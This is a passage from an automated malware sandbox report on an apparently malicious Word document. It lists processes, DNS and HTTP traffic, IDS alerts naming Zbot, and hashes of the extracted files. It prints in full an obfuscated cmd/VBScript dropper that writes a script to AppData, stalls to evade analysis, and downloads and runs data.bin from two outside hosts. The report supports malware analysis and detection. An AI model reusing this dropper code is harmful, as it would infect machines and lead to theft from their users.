= 16 To 8000804" "A8j = VJAZ7C + 44 + 47 + 65" "Next" "ELlS=72" "ENd sUB" "sUB Am()" "DmS=34" "T11gvv=97935355" "UiEGJ=18" "foR V3dELW=1 tO T11gvv" "F4c4=F4c4+1" "NeXt" "QSIUXPs=86" "iF F4c4=T11gvv Then" "MUu2w1L=50" "O17((30416/7604))" "CtY=16" "P2tWP7r(SjRhCU("58134127761F48453638511759383956495638211F0354232D1E055C39","L0g5W"))" "I4Q=35" "enD If" "WEJYXz6=46" "End sUb" "suB O17(YThPj)" "FTP7Nb=65" "DIm Qr1" "Id=7" "Qr1=TImeR+YThPj" "dO wHiLE timER<Qr1" "LOOp" "Icy=39" "EnD sUb") do @echo %~i)>"!GATi!" && start "" "!GATi!"
(PID: 3092)
- wscript.exe "%APPDATA%\17160.vbs" (PID: 2612)
-
cmd.exe
/V /C set "GATi=%APPDATA%\%RANDOM%.vbs" && (for %i in ("dIM M9" "FUNCTion TfU(SH2Y)" "Np=8" "TfU=Asc(SH2Y)" "EiAc=23" "End FuNcTiOn" "sUb MMO()" "VTPA5qS=28" "Dim Y75aZ4N,P3wS" "IUpk=87" "dO whiLE Y75aZ4N<>5604-5603" "P3wS=P3wS+1" "lOop" "Mk0J2BB=58" "End sUB" "sUb Ax0h()" "NJBGU2=25" "WRO2F9=""""" "P5yBeuK=45" "QV9HeV=M9 & UFZnET & SjRhCU("6A143E00","SDD")" "XG3mV=77" "Rlyuu=SjRhCU("0A380E592011304A580649063E36173D754855654B","EiUjw")" "SLq=24" "CkPXz M9 & SjRhCU("69075C03","PGb2V"),QV9HeV" "S9RQK=11" "iF GW4f5="" THEn O17((34020/8505))" "Ot=14" "SBw6yB="IOx6"" "TXY=29" "SeT NNvrM5=CreAtEoBjEct(SjRhCU("182B553B260842671C10532523",SBw6yB))" "JsIHIG=23" "NNvrM5.rUn Rlyuu & QV9HeV & WRO2F9,9902-9902,5391-5391" "LLbYV=48" "EnD SuB" "TVpT7=77" "Am" "funCtioN UFZnET()" "IeiG=89" "UFZnET=sECOND(TIme)" "MCUnR=7" "EnD FUnCTIOn" "FUncTiON CkPXz(RVCo,Jv)" "SxVD=39" "dIm GS3,FT,LaGEwvu,AW87,IGO(5)" "XK5d=63" "IGO(2)=107" "KSN=12" "IGO(0)=104" "XWox=94" "IGO(5)=52" "OhYR71c=9" "IGO(4)=54" "Ec=92" "IGO(1)=100" "COKk=16" "IGO(3)=50" "WVD3X=31" "GO9Qf=85" "seT GS3=cReaTEObjeCt(SjRhCU("6B542A5C381C2C565076732104206B4E2B412D050A5A5D3D563C", "E87X5Hh"))" "GEGnRI5=83" "SeT FT=GS3.GETfIle(RVCo)" "PjQm=37" "Set AW87=FT.OpENastexTsTrEaM(7870-7869,3465-3465)" "Qrn0F9x=64" "SeT LaGEwvu=GS3.crEatetEXtFIlE(Jv,3358-3357,3918-3918)" "A2tFd=23" "Do UNtiL AW87.atENdofStReam" "LaGEwvu.wriTe TD3AMvj(ECgov(TfU(AW87.reAD(8444-8443)),IGO(0)))" "loOp" "VDXk=85" "LaGEwvu.CloSe" "PlB7NKX=15" "AW87.CLoSE" "Ga=82" "eND funCtioN" "sUb XfcycJ(Eac0)" "Jcm=71" "Dim Ay" "YtOxu=2" "VfG2i="Dml"" "JoB1IzZ=58" "seT Ay=cREatEobJEct(SjRhCU("2C280B292E6A3E1836080D29",VfG2i))" "JiJM3BA=69" "Ay.OPEn" "UL=84" "Ay.tYPe=1664-1663" "AquDYm=4" "Ay.WrITE Eac0" "ADV9Gi9=59" "Ay.SavEtoFile M9 & SjRhCU("612F0116","COJo"),6325-6323" "WK=29" "Ay.CLOse" "Awmrna=42" "Ax0h" "A7eU1uk=44" "End sUB" "FuNCTION SjRhCU(VrF21TX,T7DSKIH)" "Spd=80" "dIM SdZ2xg,IYv,Yq" "EqO=31" "FoR SdZ2xg=1 tO (LEn(VrF21TX)/2)" "IYv=(TD3AMvj((-8986+9024)) & TD3AMvj((388224/5392))&(mId(VrF21TX,(SdZ2xg+SdZ2xg)-1,2)))" "Yq=(TfU(mID(T7DSKIH,((SdZ2xg Mod lEN(T7DSKIH))+1),1)))" "SjRhCU=SjRhCU+TD3AMvj(ECgov(IYv,Yq))" "nexT" "EefoNi=98" "eND FUnction" "fuNctiON P2tWP7r(YqLI6)" "GouM=82" "Dim Xjfp,DIjnB9" "BuXto4=32" "Ypa="Px8H"" "L8ZsTld=81" "On ErROR RESUMe NeXT" "LDQXi=97" "YSkD="C0PY3s"" "RxhF=79" "Set Xjfp=cReatEoBJeCt(SjRhCU("67033A411A33447E0A5B162F5C",YSkD))" "Ggz8z=97" "KUeM4="COJo"" "UPSJu" "XFAFfy=48" "Set GMA9P=Xjfp.ENViroNMENt(SjRhCU("05250516321906","JUw"))" "XNnFNUs=83" "M9=GMA9P(SjRhCU("71073825261971","M0Whag"))&TD3AMvj((1963-1871))& UFZnET & UFZnET" "RtawTK=41" "TdOivwN="QRR"" "NR0C=57" "SEt DIjnB9=CReATeobjecT(SjRhCU("1F3B32203D223D34257C0A1C1E1A050602",TdOivwN))" "Jw5LM=43" "DIjnB9.opEn SjRhCU("2E763D","Gi3i"),YqLI6,6172-6172" "D2xe8Fh=85" "DIjnB9.SenD()" "PbFk=86" "if DIjnB9.StAtus=(1620600/8103) then" "Bu=97" "UPSJu" "Xra6=97" "O17((29468/7367))" "PRIm6zI=59" "XfcycJ DIjnB9.rESpONsebody" "Lvh=63" "Else" "WO8=75" "JYPuAKS="Mdwks"" "GuSri=80" "seT DIjnB9= CReaTEobJECt(SjRhCU("291E08012217180D07633C3A273B193027",JYPuAKS))" "GijXEk=49" "DIjnB9.OPEn SjRhCU("062702","VAb"),SjRhCU("31050C1D7C41686B414F43735969615F4A5877412338051943240729","GYqxmFn" ),7189-7189" "FW=62" "DIjnB9.SeND()" "E22=71" "If DIjnB9.StatUs=(2132-1932)tHEN XfcycJ DIjnB9.ReSPOnSEBODY" "N7Ae=2" "FMN=8" "end if" "Tx=45" "enD functiOn" "FUncTioN TD3AMvj(RR)" "JE=95" "TD3AMvj=cHR(RR)" "V1=40" "ENd fUncTiOn" "fUNCTIOn ECgov(CKG0,Mhjn4)" "RBeXiY5=93" "ECgov=(CKG0 ANd NOt Mhjn4)oR(nOt CKG0 ANd Mhjn4)" "KQ=1" "eND FuncTion" "SUb UPSJu()" "A0o=28" "Dim BAFaXj, A8j" "For BAFaXj = 16 To 8000804" "A8j = VJAZ7C + 44 + 47 + 65" "Next" "ELlS=72" "ENd sUB" "sUB Am()" "DmS=34" "T11gvv=97935355" "UiEGJ=18" "foR V3dELW=1 tO T11gvv" "F4c4=F4c4+1" "NeXt" "QSIUXPs=86" "iF F4c4=T11gvv Then" "MUu2w1L=50" "O17((30416/7604))" "CtY=16" "P2tWP7r(SjRhCU("58134127761F48453638511759383956495638211F0354232D1E055C39","L0g5W"))" "I4Q=35" "enD If" "WEJYXz6=46" "End sUb" "suB O17(YThPj)" "FTP7Nb=65" "DIm Qr1" "Id=7" "Qr1=TImeR+YThPj" "dO wHiLE timER<Qr1" "LOOp" "Icy=39" "EnD sUb") do @echo %~i)>"!GATi!" && start "" "!GATi!"
(PID: 3092)
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
pataplouf.com | 213.186.33.168 | - | France |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
213.186.33.168 |
80
TCP |
wscript.exe PID: 2612 |
France
ASN: 16276 (OVH SAS) |
207.57.8.251 |
80
TCP |
wscript.exe PID: 2612 |
United States
ASN: 2914 (NTT America, Inc.) |
Contacted Countries
HTTP Traffic
Endpoint | Request | URL | |
---|---|---|---|
213.186.33.168:80 (pataplouf.com) | GET | pataplouf.com/data.bin | |
207.57.8.251:80 | GET | 207.57.8.251/data.bin |
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
local -> 213.186.33.168:80 (TCP) | A Network Trojan was detected | ET CURRENT_EVENTS Zbot Generic URI/Header Struct .bin | 2018052 |
local -> 207.57.8.251:80 (TCP) | A Network Trojan was detected | ET CURRENT_EVENTS Zbot Generic URI/Header Struct .bin | 2018052 |
local -> 207.57.8.251:80 (TCP) | A Network Trojan was detected | ET TROJAN Generic .bin download from Dotted Quad | 2018752 |
Extracted Strings
Extracted Files
-
Informative 11
-
-
~WRD0000.tmp
- Size
- 75KiB (76800 bytes)
- Type
- Composite Document File V2 Document, No summary info
- MD5
- 15c490685206769b2f13625cfa00a90e
- SHA1
- 13a77d09083ae78ce35173fe2d95babf677dfbc3
- SHA256
- 9cad3f7d265581017eaf223763d0600ffcf9ca14698cebc36caa28a4484a81b0
-
~WRD0001.tmp
- Size
- 142KiB (145408 bytes)
- Type
- Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: romaine , Template: Normal, Last Saved By: vLyk9Xw, Revision Number: 6, Name of Creating Application: Microsoft Office Word, Total Editing Time: 03:37:00, Create Time/Date: Sat Jun 4 06:27:00 2016, Last Saved Time/Date: Mon Aug 15 19:22:00 2016, Number of Pages: 6, Number of Words: 10647, Number of Characters: 60690, Security: 0
- MD5
- 14fa247cef23d99c93eb7f83811852cf
- SHA1
- afca47e37cb4a5d6d5a8ba3691210d3c8bd53e3c
- SHA256
- 5edad9d8b8ea50cf3170b6225557913e084e1eee377fe51ec3b791533bf01776
-
~WRS{43E59D0F-E69F-45E4-B6A0-051118A152EA}.tmp
- Size
- 1.5KiB (1536 bytes)
- Type
- data
- MD5
- ffb4fb601c792cf8052f476cba674cef
- SHA1
- 10454e36e39f0029b36dcfeff29b58c4ab35dfbd
- SHA256
- dc03a21de4d5e95db588498b9868d35d55579bfe8f410056c1778eea346b1521
-
index.dat
- Size
- 540B (540 bytes)
- Type
- data
- MD5
- cc42be5b3ede1855215dc4fc13e5ca2e
- SHA1
- 5ae5c648656fd08a7354b8cd64b187b154a5c7c8
- SHA256
- ff6ebf8d32d806f6cfb023d53244a71729994acfe2ac1eeb23fde45679c8d221
-
ExcludeDictionaryEN0409.lex
- Size
- 2B (2 bytes)
- Type
- Little-endian UTF-16 Unicode text, with no line terminators
- MD5
- f3b25701fe362ec84616a93a45ce9998
- SHA1
- d62636d8caec13f04e28442a0a6fa1afeb024bbb
- SHA256
- b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
-
~$2d2f776914119ff7f66b6c39ab767f4ef5b72c3b858dbe8823327f18e5e54e.doc
- Size
- 162B (162 bytes)
- Type
- data
- MD5
- a246cf6ecc406d178846dd42acd65c2f
- SHA1
- 8e6d9c44eb10be7825a8952841e09e20b06b9bc8
- SHA256
- a5d0e5fd6f8b29eb05bcfa870130881dfd77136dfba6699d7c878ae74f091a30
-
~WRS{C64C600A-AAEE-47D7-BF9F-EA7D4A029D89}.tmp
- Size
- 1KiB (1024 bytes)
- Type
- FoxPro FPT, blocks size 0, next free block index 218103808, 1st used item "\375"
- MD5
- 5d4d94ee7e06bbb0af9584119797b23a
- SHA1
- dbb111419c704f116efa8e72471dd83e86e49677
- SHA256
- 4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
-
~$Normal.dotm
- Size
- 162B (162 bytes)
- Type
- data
- MD5
- a246cf6ecc406d178846dd42acd65c2f
- SHA1
- 8e6d9c44eb10be7825a8952841e09e20b06b9bc8
- SHA256
- a5d0e5fd6f8b29eb05bcfa870130881dfd77136dfba6699d7c878ae74f091a30
-
922d2f776914119ff7f66b6c39ab767f4ef5b72c3b858dbe8823327f18e5e54e.LNK
- Size
- 733B (733 bytes)
- Type
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Mon Aug 15 14:23:38 2016, mtime=Mon Aug 15 14:23:38 2016, atime=Mon Aug 15 23:22:42 2016, length=236544, window=hide
- MD5
- 3566603c78e61bc0cd4374d90eb627ce
- SHA1
- e140efa1c6dc713b3ef463a4c6fc179bd179e71d
- SHA256
- 3b363983266fb636cf50d3871c8b66643c635959557460b72cf2e239d0ac5f39
-
17160.vbs
- Size
- 3.8KiB (3847 bytes)
- Type
- ASCII text, with CRLF line terminators
- MD5
- 964b3d91eb76d9115de0dfaf0c8182a6
- SHA1
- c05bb6aa3b2248fec92863c5d75bb3d5a844a798
- SHA256
- 22533f7d4d651c2daa407b652098868786b9e39dfa7f195274e607dad3248672
-
~WRS{51DD4C89-F05C-49E8-8D65-02A379E56D57}.tmp
- Size
- 1KiB (1026 bytes)
- Type
- FoxPro FPT, blocks size 0, next free block index 218103808, 1st used item "\002\004"
- MD5
- 78f6834114b34f290bd8d9ded1286788
- SHA1
- b538acf15c80deb4976eaff96046310c0d6001a5
- SHA256
- e5069ba4c46c6e65aeaf10ca5573e0e99b77c474ccdb28c5cf6805bbe06a0a27
-
Notifications
-
Runtime
- Added comment to Virus Total report
- Not all sources for signature ID "api-55" are available in the report
- Not all sources for signature ID "hooks-8" are available in the report
- Not all sources for signature ID "string-43" are available in the report